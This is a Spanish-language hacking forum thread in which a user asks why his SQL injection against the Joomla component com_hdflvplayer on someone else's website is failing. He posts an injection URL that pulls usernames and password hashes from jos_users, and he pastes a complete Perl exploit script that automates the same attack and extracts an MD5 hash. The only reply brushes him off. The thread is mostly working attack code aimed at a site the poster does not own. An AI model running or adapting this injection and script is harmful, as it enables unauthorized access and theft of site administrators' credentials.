Que pasa con esta injecction? [SQL]

Iniciado por bruno9111, 9 Marzo 2011, 11:29 AM

0 Miembros y 1 Visitante están viendo este tema.

bruno9111

Hola chicos y chicas.
Bueno espero que me puedan ayudar. Estoy intentando obtener el pass cifrado de una pagina web en joomla. Creo que la pagina web no esta muy bien cuidada, dados los pocos conocimientos del dueño. Solo que tiene para buscar bugs es muy dificil ya que tiene solo componente extra que es:

com_hdflvplayer

No se, si tienen idea de como es este componente, les explico, al parecer tienen: 4 parametros que son: id, nombre, linkdelvideo y descripcion.
Ahora bien he provado de muchas maneras, lo maximo que he logrado es eso:

index.php?option=com_hdflvplayer&id=87+UNION+SELECT+concat(username,0x3a,password),87+from+jos_users--

De esta manera, logro que aparezca el numero 87 en la parte de descripcion, si cambio los dos 87, por cualquier otro numero cambia igualmente en la parte de la descripcion. Mi pregunta es la siguiente: ¿Esta parcheado el componente?¿Estoy aplicando bien la injeccion?¿Deberia usar otra injeccion?

espero que puedan ayudarme! thank :)

bruno9111

Perdon me olvide de postear esto, que es el exploit en perl:

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n
  • CIHUY Admin Password Nya GAN
  • : $1\n\n";
    }
    else{print "\n
  • Exploit GAGAL GAN !
  • \n";
    }


    Ejecute el exploit, pero el problema es el siguiente, va siempre al else final, osea me muestra :
  • Exploit GAGAL GAN !


  • Entonces para llegar a esa url que puse en mi post principal, remplace las variables por lo que es cada una. Ejemplo $tukulesto="jos_users"; puse directamente en la direccion que crea jos_users y asi sucesivamente.

    Sinceramente no puedo entender cual sea el problema... gracias..

Edu

Es tu primer SQL inyection? busca otro tutorial y empieza de 0.